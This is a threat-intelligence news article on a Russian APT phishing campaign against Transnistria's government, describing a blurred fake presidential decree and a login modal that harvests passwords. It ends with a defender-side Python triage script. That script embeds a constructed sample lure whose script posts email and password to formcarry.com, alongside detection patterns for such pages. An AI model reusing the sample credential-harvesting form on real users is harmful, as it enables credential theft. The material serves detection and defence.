A sophisticated Russian Advanced Persistent Threat (APT) group has launched a targeted credential harvesting campaign against the governing body of Transnistria (the Pridnestrovian Moldavian Republic), utilizing high-pressure lures disguised as official presidential orders.
A new analysis by StrikeReady Labs details the attack, which began on December 5, 2025. The threat actors spoofed the Presidential Administration, sending emails with the subject line “Order of the President of the PMR… No. 441rp,” demanding that employees review a new mandatory decree immediately.
The attack vector relies on a malicious HTML attachment named Распоряжение № 441рп.pdf.html. Once opened, the file displays a convincing document from the “Pridnestrovian Moldavian Republic,” but with a frustrating twist: the content is intentionally obscured.
“The html loads the image in a DIV named bluer… The CSS applies a blur filter,” the report explains. By applying a single CSS rule (filter: blur(5.5px);), the attackers render the background document unreadable.

To see the “protected” file, the victim is presented with a login modal demanding their email and password. This visual social engineering tactic leverages curiosity and urgency, forcing the user to interact with the malicious login box to resolve the blurred image.
Under the hood, the phishing page employs unusual JavaScript logic to validate the victim’s input. The page includes a specific function, checkP(str), which tests the entered password against a complex regular expression.
StrikeReady researchers noted a devious fail-safe in the code. While the script checks if the password meets complexity requirements, it doesn’t actually care if the validation passes or fails.
“If the password matches the regex, it is POSTed to formcarry.com. However, if the password does not match, it still steals the data,” the report states. This suggests the attackers are casting a wide net, potentially gathering secondary passwords that might be valid for other services even if they don’t meet the complexity criteria of the primary target.
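As an added, defender-side example (not code from the StrikeReady report), the following Python triage function flags an HTML attachment that combines the traits described above: a double extension, a CSS blur overlay, a password field, and a form that posts off-site. The sample HTML, the `triage` function and the relay-host list are constructed for this example.

```python
"""Triage heuristic for HTML attachments built like the blurred-decree lure."""
import re
from urllib.parse import urlparse

# Constructed sample that mimics the traits the report describes; not the real lure.
SAMPLE_HTML = """<html><head><style>#bluer { filter: blur(5.5px); }</style></head>
<body><div id="bluer"><img src="decree.png"></div>
<form id="login"><input type="email" name="e"><input type="password" name="p"></form>
<script>
function checkP(str){ return /^(?=.*[A-Z])(?=.*\\d).{8,}$/.test(str); }
document.getElementById("login").onsubmit = function(ev){ ev.preventDefault();
  fetch("https://formcarry.com/s/EXAMPLE", {method:"POST", body:new FormData(ev.target)}); };
</script></body></html>"""

DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.html?$", re.I)
BLUR_CSS = re.compile(r"filter\s*:\s*blur\(", re.I)
PASSWORD_INPUT = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
# Places a page can ship form data: action=, fetch(), XMLHttpRequest.open("POST", ...)
POST_TARGET = re.compile(
    r"(?:action\s*=\s*['\"]|fetch\(\s*['\"]|\.open\(\s*['\"]POST['\"]\s*,\s*['\"])"
    r"(https?://[^'\"]+)", re.I)
# Hypothetical relay list; the page names formcarry.com, extend it from your own intel.
RELAY_HOSTS = {"formcarry.com"}


def triage(filename: str, html: str) -> dict:
    """Return the indicators found and a verdict. A blurred page plus a password
    field that posts off-site is the exact combination the lure relies on."""
    hits = []
    if DOUBLE_EXT.search(filename):
        hits.append("double-extension filename")
    if BLUR_CSS.search(html):
        hits.append("css blur overlay")
    if PASSWORD_INPUT.search(html):
        hits.append("password input in attachment")
    for url in POST_TARGET.findall(html):
        host = urlparse(url).hostname or ""
        if host in RELAY_HOSTS:
            hits.append(f"posts credentials to relay host {host}")
        else:
            hits.append(f"posts form data off-site to {host}")
    posts_out = any(h.startswith("posts") for h in hits)
    if "css blur overlay" in hits and "password input in attachment" in hits and posts_out:
        verdict = "likely credential phish"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": hits, "verdict": verdict}
```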
While this specific incident targeted Transnistria, evidence suggests it is part of a much wider, long-running intelligence operation active since at least 2023.
StrikeReady Labs identified numerous other lures linked to this campaign, revealing a heavy focus on European and NATO-aligned entities. The target list includes:
- Ukraine: Specifically the Defense Industrial Base (DIB) and government sectors.
- The Balkans: Governments of Bosnia and Herzegovina, Macedonia, Montenegro, and Bulgaria.
- NATO: Lures referencing “Cyber Threats and NATO Horizon Scanning” and “NATO SCHOOL Course Catalogue”.
- Diplomatic Missions: Targeted via “Diplomatic List” lures accredited to the European Union.
In some variations of the campaign, the attackers utilized external infrastructure, such as the domain timesyncwindows[.]com, to load malicious scripts dynamically.
This campaign illustrates the persistent threat Russian APTs pose to regional stability, leveraging standard web technologies to compromise high-value targets across Eastern Europe.